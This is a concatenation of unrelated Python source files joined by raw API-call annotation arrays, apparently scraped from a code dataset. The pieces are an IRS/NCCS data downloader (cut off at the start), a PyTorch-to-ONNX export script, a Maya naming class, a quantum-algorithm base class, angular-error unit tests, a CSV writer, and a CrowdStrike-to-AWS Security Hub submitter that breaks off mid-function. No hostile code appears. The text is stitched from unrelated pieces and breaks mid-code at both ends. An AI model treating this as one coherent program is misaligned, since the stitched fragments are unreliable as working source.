        names (list) : Default ['EIN', 'EPOSTCARD'], provides the header names.  Must be the same dimension
                       as usecols.
        date_col (str) : Default 'EPOSTCARD', specifies the column to be converted to date dtype.
        RETURNS
        DataFrame
        """
        url = self.urls['epostcard']
        delim = self.epostcard_delim
        #a df of 'EIN', 'YEAR' from the epostcard records
        df = pd.read_csv(self.download_file(url, force=True),
                         skip_blank_lines=True,
                         sep=delim,
                         usecols=usecols,
                         names=names,
                         dtype='str')
        df.set_index('EIN', inplace=True)
        df = df[df[date_col] != ''] #drop null dates
        assert(df.index.is_unique), 'Expected unique EINs in epostcard data.'
        return df
    def download_bmf(self):
        """
        Accesses the stored URLs for the raw BMF files from the IRS, then passes the necessary information
        into the download_file method.
        ARGUMENTS
        None
        RETURNS
        DataFrame
        """
        bmf_data = {}
        delim = self.bmf_delim
        for region in self.urls['BMF'].keys():
            url = self.urls['BMF'][region]
            bmf_data[region] = pd.read_csv(self.download_file(url), sep=delim, dtype='str')
        df = pd.concat(bmf_data).set_index('EIN')
        assert(df.index.is_unique), 'Expected unique EINs in BMF data.'
        return df
    def download_file(self, url, force=False):
        """
        Method for downloading the specified URL, then unzipping it if necessary.  All newly-downloaded
        files are set to read-only.
        ARGUMENTS
        url (str) : Any valid URL
        force (bool) : Default False, when True it will ignore existing files in the "downloads/IRS" folder,
                       when False it will only download a new version if the file does not already exist.
        RETURNS
        str : Location on local file system of the downloaded (or pre-existing) file.
        """
        main = self.main
        output_path = os.path.join(main.path, self.irs_download_folder)
        fname = url.split('/')[-1] #extracts the file name from the end of the url
        output_file = os.path.join(output_path, fname) #full location of file to write to
        if main.force_new_download or force or not os.path.exists(output_file):
            r = requests.get(url, headers=self.headers)
            #this catches invalid URLs entered into the url text files: the IRS website returns a
            #page saying "404 error code" but since that page is a valid page, it returns an actual
            #success code of 200.  Simply searching for 'Page Not Found' in the body is very slow
            #when it is an actual download link with a large file, so it first checks the headers
            #to make sure it's not ['Content-Type'] = 'application/zip'
            if 'text/html' in r.headers['Content-Type'] and 'Page Not Found' in r.text:
                #BUGFIX: the offending URL is now substituted into the message
                raise Exception('Warning: the url {} appears to be invalid.'.format(url))
            with open(output_file, 'wb') as ofile:
                ofile.write(r.content)
            os.chmod(output_file, S_IREAD|S_IRGRP|S_IROTH) #sets the download to read-only
            main.logger.info('File {} downloaded.'.format(fname))
            if fname.endswith('.zip'):
                zip_ref = zipfile.ZipFile(output_file, 'r')
                zip_ref.extractall(output_path+os.sep) #unzips into the download path
                #looks at the list of unizpped items, warns if there is more than 1
                unzipped_files = zip_ref.namelist()
                zip_ref.close() #finished with the zip object
                if len(unzipped_files) != 1:
                    main.logger.info('WARNING: More or less than one file in {}; system may not be using the right one as data.'.format(fname))
                #sets the unzipped files to read-only
                for nfile in unzipped_files:
                    output_file = os.path.join(output_path, nfile)
                    os.chmod(output_file, S_IREAD|S_IRGRP|S_IROTH)
                    main.logger.info('File {} extracted from zip.'.format(nfile))
                #returns the contents of a zip file as the output file
                return output_file
            else:
                #returns the output file if it's not zipped
                return output_file
        else:
            main.logger.info('Using existing contents of {} in downloads.'.format(fname))
            return output_file
| [
"os.path.exists",
"os.listdir",
"zipfile.ZipFile",
"re.compile",
"os.path.join",
"pymysql.connect",
"requests.get",
"getpass.getpass",
"os.chmod",
"pandas.to_numeric",
"sys.stdin.isatty",
"pandas.concat"
] | [((1685, 1757), 're.compile', 're.compile', (['"""(\\\\d{4})\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*"""'], {}), "('(\\\\d{4})\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*')\n", (1695, 1757), False, 'import re\n'), ((1771, 1787), 're.compile', 're.compile', (['"""^#"""'], {}), "('^#')\n", (1781, 1787), False, 'import re\n'), ((2743, 2818), 're.compile', 're.compile', (['"""(epostcard)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*"""'], {}), "('(epostcard)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*')\n", (2753, 2818), False, 'import re\n'), ((2833, 2849), 're.compile', 're.compile', (['"""^#"""'], {}), "('^#')\n", (2843, 2849), False, 'import re\n'), ((3641, 3716), 're.compile', 're.compile', (['"""(region\\\\d)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*"""'], {}), "('(region\\\\d)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*')\n", (3651, 3716), False, 'import re\n'), ((3730, 3746), 're.compile', 're.compile', (['"""^#"""'], {}), "('^#')\n", (3740, 3746), False, 'import re\n'), ((8960, 9015), 'os.path.join', 'os.path.join', (['self.main.path', 'self.nccs_download_folder'], {}), '(self.main.path, self.nccs_download_folder)\n', (8972, 9015), False, 'import os, sys\n'), ((9045, 9066), 'os.listdir', 'os.listdir', (['file_path'], {}), '(file_path)\n', (9055, 9066), False, 'import os, sys\n'), ((15116, 15165), 'os.path.join', 'os.path.join', (['main.path', 'self.irs_download_folder'], {}), '(main.path, self.irs_download_folder)\n', (15128, 15165), False, 'import os, sys\n'), ((15271, 15303), 'os.path.join', 'os.path.join', (['output_path', 'fname'], {}), '(output_path, fname)\n', (15283, 15303), False, 'import os, sys\n'), ((5787, 5805), 'sys.stdin.isatty', 'sys.stdin.isatty', ([], {}), '()\n', (5803, 5805), False, 'import os, sys\n'), ((15436, 15475), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', 
(15448, 15475), False, 'import requests\n'), ((2869, 2924), 'os.path.join', 'os.path.join', (['path', '"""settings"""', '"""urls"""', '"""epostcard.txt"""'], {}), "(path, 'settings', 'urls', 'epostcard.txt')\n", (2881, 2924), False, 'import os, sys\n'), ((3766, 3815), 'os.path.join', 'os.path.join', (['path', '"""settings"""', '"""urls"""', '"""bmf.txt"""'], {}), "(path, 'settings', 'urls', 'bmf.txt')\n", (3778, 3815), False, 'import os, sys\n'), ((6093, 6139), 'getpass.getpass', 'getpass.getpass', ([], {'prompt': '""" MySQL password: """'}), "(prompt=' MySQL password: ')\n", (6108, 6139), False, 'import getpass\n'), ((6196, 6271), 'pymysql.connect', 'pymysql.connect', ([], {'host': 'self.sql_server_name', 'db': '"""nccs"""', 'user': 'un', 'password': 'pw'}), "(host=self.sql_server_name, db='nccs', user=un, password=pw)\n", (6211, 6271), False, 'import pymysql\n'), ((10045, 10084), 'os.path.join', 'os.path.join', (['file_path', "(fname + '.csv')"], {}), "(file_path, fname + '.csv')\n", (10057, 10084), False, 'import os, sys\n'), ((14358, 14377), 'pandas.concat', 'pd.concat', (['bmf_data'], {}), '(bmf_data)\n', (14367, 14377), True, 'import pandas as pd\n'), ((15391, 15418), 'os.path.exists', 'os.path.exists', (['output_file'], {}), '(output_file)\n', (15405, 15418), False, 'import os, sys\n'), ((16216, 16266), 'os.chmod', 'os.chmod', (['output_file', '(S_IREAD | S_IRGRP | S_IROTH)'], {}), '(output_file, S_IREAD | S_IRGRP | S_IROTH)\n', (16224, 16266), False, 'import os, sys\n'), ((16427, 16460), 'zipfile.ZipFile', 'zipfile.ZipFile', (['output_file', '"""r"""'], {}), "(output_file, 'r')\n", (16442, 16460), False, 'import zipfile\n'), ((12121, 12160), 'os.path.join', 'os.path.join', (['file_path', "(fname + '.csv')"], {}), "(file_path, fname + '.csv')\n", (12133, 12160), False, 'import os, sys\n'), ((17069, 17101), 'os.path.join', 'os.path.join', (['output_path', 'nfile'], {}), '(output_path, nfile)\n', (17081, 17101), False, 'import os, sys\n'), ((17122, 17172), 
'os.chmod', 'os.chmod', (['output_file', '(S_IREAD | S_IRGRP | S_IROTH)'], {}), '(output_file, S_IREAD | S_IRGRP | S_IROTH)\n', (17130, 17172), False, 'import os, sys\n'), ((10386, 10425), 'pandas.to_numeric', 'pd.to_numeric', (['df[col]'], {'errors': '"""coerce"""'}), "(df[col], errors='coerce')\n", (10399, 10425), True, 'import pandas as pd\n'), ((11610, 11643), 'pandas.to_numeric', 'pd.to_numeric', (['c'], {'errors': '"""coerce"""'}), "(c, errors='coerce')\n", (11623, 11643), True, 'import pandas as pd\n')] |
# Copyright (c) 2021 <NAME>(<EMAIL>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import torch
import yaml
import onnxruntime as ort
def get_args():
    """Parse and return the command-line arguments for the ONNX export tool.

    Returns:
        argparse.Namespace: holds ``config``, ``jit_model`` and ``onnx_model``.
    """
    parser = argparse.ArgumentParser(description='export to onnx model')
    # All three arguments are mandatory; register them uniformly.
    for flag, msg in (('--config', 'config file'),
                      ('--jit_model', 'pytorch jit script model'),
                      ('--onnx_model', 'output onnx model')):
        parser.add_argument(flag, required=True, help=msg)
    return parser.parse_args()
def main():
    """Export a TorchScript model to ONNX and sanity-check numerical parity.

    Reads the input feature dimension from the YAML config, loads the jit
    model, exports it with a dynamic time axis, then runs the same random
    input through both pytorch and onnxruntime and compares the outputs.
    """
    args = get_args()
    with open(args.config, 'r') as fin:
        configs = yaml.load(fin, Loader=yaml.FullLoader)
    feature_dim = configs['model']['input_dim']
    model = torch.jit.load(args.jit_model)
    print(model)
    # dummy_input: (batch, time, feature_dim)
    dummy_input = torch.randn(1, 100, feature_dim, dtype=torch.float)
    # Axis 1 (time) is declared dynamic so the exported graph accepts
    # variable-length sequences.
    torch.onnx.export(model,
                      dummy_input,
                      args.onnx_model,
                      input_names=['input'],
                      output_names=['output'],
                      dynamic_axes={'input': {
                          1: 'T'
                      }})
    torch_output = model(dummy_input)
    ort_sess = ort.InferenceSession(args.onnx_model)
    onnx_input = dummy_input.numpy()
    onnx_output = ort_sess.run(None, {'input': onnx_input})
    # Element-wise comparison of the two backends on identical input.
    if torch.allclose(torch_output, torch.tensor(onnx_output[0])):
        print('Export to onnx succeed!')
    else:
        print('''Export to onnx succeed, but pytorch/onnx have different
              outputs when given the same input, please check!!!''')
# Script entry point.
if __name__ == '__main__':
    main()
| [
"argparse.ArgumentParser",
"torch.jit.load",
"onnxruntime.InferenceSession",
"yaml.load",
"torch.tensor",
"torch.randn",
"torch.onnx.export"
] | [((683, 742), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""export to onnx model"""'}), "(description='export to onnx model')\n", (706, 742), False, 'import argparse\n'), ((1318, 1348), 'torch.jit.load', 'torch.jit.load', (['args.jit_model'], {}), '(args.jit_model)\n', (1332, 1348), False, 'import torch\n'), ((1430, 1481), 'torch.randn', 'torch.randn', (['(1)', '(100)', 'feature_dim'], {'dtype': 'torch.float'}), '(1, 100, feature_dim, dtype=torch.float)\n', (1441, 1481), False, 'import torch\n'), ((1486, 1629), 'torch.onnx.export', 'torch.onnx.export', (['model', 'dummy_input', 'args.onnx_model'], {'input_names': "['input']", 'output_names': "['output']", 'dynamic_axes': "{'input': {(1): 'T'}}"}), "(model, dummy_input, args.onnx_model, input_names=['input'\n ], output_names=['output'], dynamic_axes={'input': {(1): 'T'}})\n", (1503, 1629), False, 'import torch\n'), ((1837, 1874), 'onnxruntime.InferenceSession', 'ort.InferenceSession', (['args.onnx_model'], {}), '(args.onnx_model)\n', (1857, 1874), True, 'import onnxruntime as ort\n'), ((1219, 1257), 'yaml.load', 'yaml.load', (['fin'], {'Loader': 'yaml.FullLoader'}), '(fin, Loader=yaml.FullLoader)\n', (1228, 1257), False, 'import yaml\n'), ((2008, 2036), 'torch.tensor', 'torch.tensor', (['onnx_output[0]'], {}), '(onnx_output[0])\n', (2020, 2036), False, 'import torch\n')] |
from maya import cmds
import copy
# TODO: Find a way to have different naming for different production.
# Maybe handle it in the rig directly?
class BaseName(object):
    """
    This class handle the naming of object.
    Store a name as a list of 'tokens'
    When resolved, the tokens are joinned using a 'separator' (normally an underscore)
    Also some specific properties exists:
    - Side: Generally L/R token
    - Prefix: Always the first token
    - Suffix: Always the last token
    You can resolve a BaseName instance from a string.
    >>> name = BaseName('l_eye_jnt')
    >>> name.resolve()
    'l_eye_jnt'
    You can build a BaseName instance manually.
    >>> name = BaseName(tokens=('eye',), suffix='jnt', side=BaseName.SIDE_L)
    >>> name.resolve()
    'l_eye_jnt'
    You can add tokens at any time.
    >>> name.add_tokens('upp')
    >>> name.resolve()
    'l_eye_upp_jnt'
    You can override a BaseName public properties.
    >>> name = BaseName()
    >>> name.tokens = ('eye',)
    >>> name.resolve()
    'eye'
    >>> name.suffix = 'jnt'
    >>> name.resolve()
    'eye_jnt'
    >>> name.side = name.SIDE_L
    >>> name.resolve()
    'l_eye_jnt'
    """
    separator = '_'
    type_anm = 'anm'
    type_anm_grp = 'anm_grp'
    type_jnt = 'jnt'
    type_rig = 'rig'
    type_rig_grp = 'data_grp'
    root_anm_name = 'anms'
    root_geo_name = 'geos'
    root_jnt_name = 'jnts'
    root_rig_name = 'data'
    root_backup_name = 'backup'
    layer_anm_name = 'layer_anm'
    layer_rig_name = 'layer_rig'
    layer_geo_name = 'layer_geo'
    SIDE_L = 'l'
    SIDE_R = 'r'
    def __init__(self, name=None, tokens=None, prefix=None, suffix=None, side=None):
        self.tokens = []
        self.prefix = None
        self.suffix = None
        self.side = None
        if name:
            #BUGFIX: build_from_string returns None; its result used to be
            #assigned to "tokens", which silently discarded an explicitly
            #passed tokens argument.  Now the manual overrides below apply.
            self.build_from_string(name)
        # Apply manual overrides
        if tokens:
            self.tokens = tokens
        if prefix:
            self.prefix = prefix
        if suffix:
            self.suffix = suffix
        if side:
            self.side = side
    def copy(self):
        """
        Return a copy of the name object.
        """
        inst = self.__class__()
        inst.tokens = copy.copy(self.tokens)
        inst.prefix = self.prefix
        inst.suffix = self.suffix
        #BUGFIX: the side was previously lost when copying
        inst.side = self.side
        return inst
    def rebuild(self, name):
        """
        Return a new instance parsed from the given string, keeping the
        current prefix and suffix.
        """
        return self.__class__(name, prefix=self.prefix, suffix=self.suffix)
    def get_basename(self):
        """
        Each name have one single token that represent it's part.
        ex: L_LegUpp_Ik_Ctrl -> LegUpp
        By default it is the first non-side token in the name.
        return: The part name.
        """
        for token in self.tokens:
            if not self.get_side_from_token(token):
                return token
    def remove_extra_tokens(self):
        """
        Remove any tokens that is not the base token or a side token.
        :return:
        """
        basename = self.get_basename()
        found_base_token = False
        new_tokens = []
        for token in self.tokens:
            if self.get_side_from_token(token):
                new_tokens.append(token)
            elif not found_base_token and token == basename:
                new_tokens.append(token)
        self.tokens = new_tokens
    def build_from_string(self, name):
        """
        Reset the tokens and side, then re-populate them by parsing the
        provided string.  The prefix and suffix are intentionally preserved.
        """
        raw_tokens = self._get_tokens(name)
        self.tokens = []
        self.side = None
        self.add_tokens(*raw_tokens)
    def _get_tokens(self, val):
        #split a raw string into tokens using the class separator
        return val.split(self.separator)
    def _join_tokens(self, tokens):
        #inverse of _get_tokens: assemble tokens into a single string
        return self.separator.join(tokens)
    def add_tokens(self, *args):
        """
        Append tokens to the name.  Tokens recognized as side markers are
        stored in self.side instead of the token list.
        """
        for arg in args:
            for token in arg.split(self.separator):
                side = self.get_side_from_token(token)
                if side:
                    self.side = side
                else:
                    self.tokens.append(token)
    def add_suffix(self, suffix):
        """Append a token at the end of the token list."""
        self.tokens.append(suffix)
    def add_prefix(self, prefix):
        """Insert a token at the start of the token list."""
        self.tokens.insert(0, prefix)
    def get_unique_name(self, name):
        """
        Return a name guaranteed not to exist in the current Maya scene by
        appending an incrementing number if needed.
        """
        if cmds.objExists(name):
            i = 1
            while cmds.objExists(name + str(i)):
                i += 1
            return name + str(i)
        return name
    @classmethod
    def get_side_from_token(cls, token):
        """
        Return the canonical side constant (SIDE_L/SIDE_R) if the token is a
        side marker (case-insensitive), otherwise None.
        """
        token_lower = token.lower()
        if token_lower == cls.SIDE_L.lower():
            return cls.SIDE_L
        if token_lower == cls.SIDE_R.lower():
            return cls.SIDE_R
    def get_tokens(self):
        """
        :return: All token without the side tokens.
        """
        return [token for token in self.tokens if not self.get_side_from_token(token)]
    def resolve(self, *args):
        """
        Join prefix, side, tokens, any extra tokens and suffix (in that
        order) into the final name string.
        """
        tokens = []
        if self.prefix:
            tokens.append(self.prefix)
        if self.side:
            tokens.append(self.side)
        tokens.extend(self.tokens)
        tokens.extend(args)
        if self.suffix:
            tokens.append(self.suffix)
        name = self._join_tokens(tokens)
        # If we have name conflicts, we WILL want to crash.
        return name
    def rename(self, obj, *args):
        """Resolve the name and apply it to the provided Maya object."""
        name = self.resolve(*args)
        obj.rename(name)
    def __repr__(self):
        return self.resolve()
| [
"copy.copy",
"maya.cmds.objExists"
] | [((2244, 2266), 'copy.copy', 'copy.copy', (['self.tokens'], {}), '(self.tokens)\n', (2253, 2266), False, 'import copy\n'), ((4201, 4221), 'maya.cmds.objExists', 'cmds.objExists', (['name'], {}), '(name)\n', (4215, 4221), False, 'from maya import cmds\n')] |
# Copyright 2022 Tiernan8r
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Constructs the quantum register, circuits of composite gates, and runs the
simulation of Grover's Algorithm
"""
import abc
from typing import Tuple
from qcp.matrices import SPARSE, DefaultMatrix, Matrix
class GeneralAlgorithm(abc.ABC):
    """Common scaffolding for a quantum algorithm simulation: holds the
    register size, the initial state vector and the circuit matrix, and
    drives the simulation via run()/measure().  Subclasses provide the
    circuit and measurement logic."""
    def __init__(self, size: int):
        """
        :param size: number of qubits in the register; must be at least 2.
        """
        assert size > 1, "need minimum of two qbits"
        self.size = size
        self.state = self.initial_state()
        # construct_circuit() is expected to be overridden; the base
        # implementation returns None, which run() tolerates.
        self.circuit = self.construct_circuit()
    def initial_state(self) -> Matrix:
        """
        Creates a state vector with amplitude 1 on basis index 0, i.e. the
        all-zeros state |0...0>.
        returns:
            Matrix: the state vector
        """
        # Sparse column vector of dimension 2^size with a single 1 entry.
        entries: SPARSE = {i: {} for i in range(2 ** self.size)}
        entries[0][0] = 1
        return DefaultMatrix(entries)
    def construct_circuit(self) -> Matrix:
        """
        Construct the circuit for the algorithm
        returns:
            Matrix: Matrix representing our the circuit for the algorithm
        """
        pass
    def run(self) -> Matrix:
        """
        Run the algorithm by applying the quantum circuit to the initial
        state
        returns:
            Matrix: Column matrix representation of the final state
        """
        # Skip the multiply when the subclass provided no circuit.
        if self.circuit is not None:
            self.state = self.circuit * self.state
        return self.state
    def measure(self) -> Tuple[int, float]:
        """
        'measures' self.state by selecting a state weighted by its
        (amplitude ** 2)
        returns:
            Tuple[int, float]: The state observed and the probability of
                               measuring said state
        """
        pass
| [
"qcp.matrices.DefaultMatrix"
] | [((1301, 1323), 'qcp.matrices.DefaultMatrix', 'DefaultMatrix', (['entries'], {}), '(entries)\n', (1314, 1323), False, 'from qcp.matrices import SPARSE, DefaultMatrix, Matrix\n')] |
import math
import numpy as np
import torch
from mock import patch
from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial
def test_spherical2cartesial():
    """spherical2cartesial maps batches of (theta, phi) angles to unit xyz."""
    angles = torch.Tensor([
        [0, 0],
        [math.pi / 2, 0],
        [-math.pi / 2, 0],
        [0, math.pi / 2],
        [math.pi / 2, math.pi / 2],
    ])
    expected = np.array([
        [0, 0, -1],
        [1, 0, 0],
        [-1, 0, 0],
        [0, 1, 0],
        [0, 1, 0],
    ])
    cart = spherical2cartesial(angles)
    # Output must be a torch tensor of shape (batch, 3).
    assert isinstance(cart, torch.Tensor)
    assert cart.shape[0] == angles.shape[0]
    assert cart.shape[1] == 3
    # Every converted vector must match the reference within tolerance.
    assert np.linalg.norm(expected - cart.numpy(), axis=1).max() < 1e-5
@patch('core.train_utils.epsilon', 0)
def test_compute_angular_error_xyz_arr():
    """Per-row angular error (degrees) between batches of xyz directions."""
    rt2 = math.sqrt(2)
    first = torch.Tensor([
        [0.8001 / rt2, 0.6, 0.8 / rt2],
        [1, 0, 0],
        [0, 1, 0],
        [0, 0, 1],
        [-1, 0, 0],
        [1 / rt2, 0, 1 / rt2],
    ])
    second = torch.Tensor([
        [0.8 / rt2, 0.6, 0.8 / rt2],
        [-1, 0, 0],
        [0, 0, 1],
        [0, 0, -1],
        [-1, 0, 0],
        [-1 / rt2, 0, 1 / rt2],
    ])
    # Expected angles: near-identical, opposite, orthogonal, opposite,
    # identical, orthogonal.
    expected = torch.Tensor([
        0,
        180,
        180 / 2,
        180,
        0,
        180 / 2,
    ])
    result = compute_angular_error_xyz_arr(first, second)
    assert np.max(np.abs(result.numpy() - expected.numpy())) < 1e-5
@patch('core.train_utils.epsilon', 0)
def test_compute_angular_error():
    """Mean angular error (degrees) between spherical-coordinate batches."""
    first = torch.Tensor([
        [math.pi / 2, 0],
        [0, math.pi / 2],
        [math.pi, 0],
        [-math.pi / 2, 0],
        [math.pi / 4, 0],
    ])
    second = torch.Tensor([
        [-math.pi / 2, 0],
        [math.pi, 0],
        [0, 0],
        [-math.pi / 2, 0],
        [-math.pi / 4, 0],
    ])
    # Per-row expected angles; the function returns their mean.
    expected = torch.Tensor([
        180,
        180 / 2,
        180,
        0,
        180 / 2,
    ])
    result = compute_angular_error(first, second)
    assert torch.mean(expected) == result
| [
"core.train_utils.compute_angular_error",
"mock.patch",
"torch.mean",
"core.train_utils.compute_angular_error_xyz_arr",
"torch.Tensor",
"math.sqrt",
"numpy.array",
"core.train_utils.spherical2cartesial"
] | [((740, 776), 'mock.patch', 'patch', (['"""core.train_utils.epsilon"""', '(0)'], {}), "('core.train_utils.epsilon', 0)\n", (745, 776), False, 'from mock import patch\n'), ((1504, 1540), 'mock.patch', 'patch', (['"""core.train_utils.epsilon"""', '(0)'], {}), "('core.train_utils.epsilon', 0)\n", (1509, 1540), False, 'from mock import patch\n'), ((222, 331), 'torch.Tensor', 'torch.Tensor', (['[[0, 0], [math.pi / 2, 0], [-math.pi / 2, 0], [0, math.pi / 2], [math.pi / \n 2, math.pi / 2]]'], {}), '([[0, 0], [math.pi / 2, 0], [-math.pi / 2, 0], [0, math.pi / 2],\n [math.pi / 2, math.pi / 2]])\n', (234, 331), False, 'import torch\n'), ((392, 459), 'numpy.array', 'np.array', (['[[0, 0, -1], [1, 0, 0], [-1, 0, 0], [0, 1, 0], [0, 1, 0]]'], {}), '([[0, 0, -1], [1, 0, 0], [-1, 0, 0], [0, 1, 0], [0, 1, 0]])\n', (400, 459), True, 'import numpy as np\n'), ((517, 547), 'core.train_utils.spherical2cartesial', 'spherical2cartesial', (['spherical'], {}), '(spherical)\n', (536, 547), False, 'from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial\n'), ((1272, 1320), 'torch.Tensor', 'torch.Tensor', (['[0, 180, 180 / 2, 180, 0, 180 / 2]'], {}), '([0, 180, 180 / 2, 180, 0, 180 / 2])\n', (1284, 1320), False, 'import torch\n'), ((1389, 1434), 'core.train_utils.compute_angular_error_xyz_arr', 'compute_angular_error_xyz_arr', (['input1', 'input2'], {}), '(input1, input2)\n', (1418, 1434), False, 'from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial\n'), ((1588, 1693), 'torch.Tensor', 'torch.Tensor', (['[[math.pi / 2, 0], [0, math.pi / 2], [math.pi, 0], [-math.pi / 2, 0], [math\n .pi / 4, 0]]'], {}), '([[math.pi / 2, 0], [0, math.pi / 2], [math.pi, 0], [-math.pi /\n 2, 0], [math.pi / 4, 0]])\n', (1600, 1693), False, 'import torch\n'), ((1750, 1848), 'torch.Tensor', 'torch.Tensor', (['[[-math.pi / 2, 0], [math.pi, 0], [0, 0], [-math.pi / 2, 0], [-math.pi / 4, 0]]'], {}), '([[-math.pi / 2, 0], 
[math.pi, 0], [0, 0], [-math.pi / 2, 0], [\n -math.pi / 4, 0]])\n', (1762, 1848), False, 'import torch\n'), ((1906, 1951), 'torch.Tensor', 'torch.Tensor', (['[180, 180 / 2, 180, 0, 180 / 2]'], {}), '([180, 180 / 2, 180, 0, 180 / 2])\n', (1918, 1951), False, 'import torch\n'), ((2012, 2049), 'core.train_utils.compute_angular_error', 'compute_angular_error', (['input1', 'input2'], {}), '(input1, input2)\n', (2033, 2049), False, 'from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial\n'), ((2061, 2079), 'torch.mean', 'torch.mean', (['target'], {}), '(target)\n', (2071, 2079), False, 'import torch\n'), ((865, 877), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (874, 877), False, 'import math\n'), ((890, 902), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (899, 902), False, 'import math\n'), ((995, 1007), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1004, 1007), False, 'import math\n'), ((1016, 1028), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1025, 1028), False, 'import math\n'), ((1081, 1093), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1090, 1093), False, 'import math\n'), ((1106, 1118), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1115, 1118), False, 'import math\n'), ((1214, 1226), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1223, 1226), False, 'import math\n'), ((1235, 1247), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1244, 1247), False, 'import math\n')] |
import csv
import re
from os import makedirs
from os.path import abspath, basename, dirname, isdir, join
def generate_csv(path, fields, rows, quote_empty=False):
    """Write ``rows`` to ``dirname(dirname(path))/cases/<name>.csv``.

    :param path: path of the originating ``.py`` file; its base name (with
        the ``.py`` extension replaced by ``.csv``) becomes the CSV name.
    :param fields: sequence of column names written as the header row.
    :param rows: iterable of row sequences passed to ``csv.writer.writerows``.
    :param quote_empty: when True use ``csv.QUOTE_NONNUMERIC`` so empty/text
        fields are quoted; otherwise ``csv.QUOTE_MINIMAL``.
    """
    path = abspath(path)
    # Replace only a trailing ".py" extension; the old pattern 'py$' also
    # mangled names such as "happy" -> "hapcsv".
    name = re.sub(r'\.py$', '.csv', basename(path))
    cases = join(dirname(dirname(path)), 'cases')
    if not isdir(cases):
        makedirs(cases)
    csv_path = join(cases, name)
    quoting = csv.QUOTE_NONNUMERIC if quote_empty else csv.QUOTE_MINIMAL
    # Open the file once: header first, then stream the data rows.
    with open(csv_path, 'w') as fobj:
        header_writer = csv.DictWriter(fobj, fieldnames=fields, lineterminator='\n')
        header_writer.writeheader()
        csv.writer(fobj, quoting=quoting, lineterminator='\n').writerows(rows)
| [
"csv.DictWriter",
"os.makedirs",
"csv.writer",
"os.path.join",
"os.path.dirname",
"os.path.isdir",
"os.path.basename",
"os.path.abspath",
"re.sub"
] | [((175, 188), 'os.path.abspath', 'abspath', (['path'], {}), '(path)\n', (182, 188), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((200, 214), 'os.path.basename', 'basename', (['path'], {}), '(path)\n', (208, 214), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((226, 252), 're.sub', 're.sub', (['"""py$"""', '"""csv"""', 'name'], {}), "('py$', 'csv', name)\n", (232, 252), False, 'import re\n'), ((367, 384), 'os.path.join', 'join', (['cases', 'name'], {}), '(cases, name)\n', (371, 384), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((314, 326), 'os.path.isdir', 'isdir', (['cases'], {}), '(cases)\n', (319, 326), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((336, 351), 'os.makedirs', 'makedirs', (['cases'], {}), '(cases)\n', (344, 351), False, 'from os import makedirs\n'), ((441, 501), 'csv.DictWriter', 'csv.DictWriter', (['fobj'], {'fieldnames': 'fields', 'lineterminator': '"""\n"""'}), "(fobj, fieldnames=fields, lineterminator='\\n')\n", (455, 501), False, 'import csv\n'), ((664, 718), 'csv.writer', 'csv.writer', (['fobj'], {'quoting': 'quoting', 'lineterminator': '"""\n"""'}), "(fobj, quoting=quoting, lineterminator='\\n')\n", (674, 718), False, 'import csv\n'), ((278, 291), 'os.path.dirname', 'dirname', (['path'], {}), '(path)\n', (285, 291), False, 'from os.path import abspath, basename, dirname, isdir, join\n')] |
from datetime import datetime
import traceback
import boto3
from botocore.exceptions import ClientError
from ...config import config
from ...log import log
class Submitter():
    """Builds an AWS Security Hub finding from a CrowdStrike Falcon
    detection event and submits it with boto3.

    ``event`` is expected to expose the attributes read below
    (``instance_id``, ``device_details``, ``severity_value``,
    ``original_event``, ``falcon_link``, ``event_id``, ...).
    """
    def __init__(self, event):
        self.event = event
    def find_instance(self, instance_id, mac_address): # pylint: disable=R0201
        # Instance IDs are unique to the region, not the account, so we have to check them all
        report_region = config.get('aws', 'region')
        ec2instance = None
        ec2_client = boto3.client("ec2")
        regions = [region["RegionName"] for region in ec2_client.describe_regions()["Regions"]]
        for region in regions:
            ec2 = boto3.resource("ec2", region_name=region)
            try:
                ec2instance = ec2.Instance(instance_id)
                found = False
                # Confirm the mac address matches
                for iface in ec2instance.network_interfaces:
                    # Normalise both MACs (lowercase, no ":" or "-") before comparing.
                    det_mac = mac_address.lower().replace(":", "").replace("-", "")
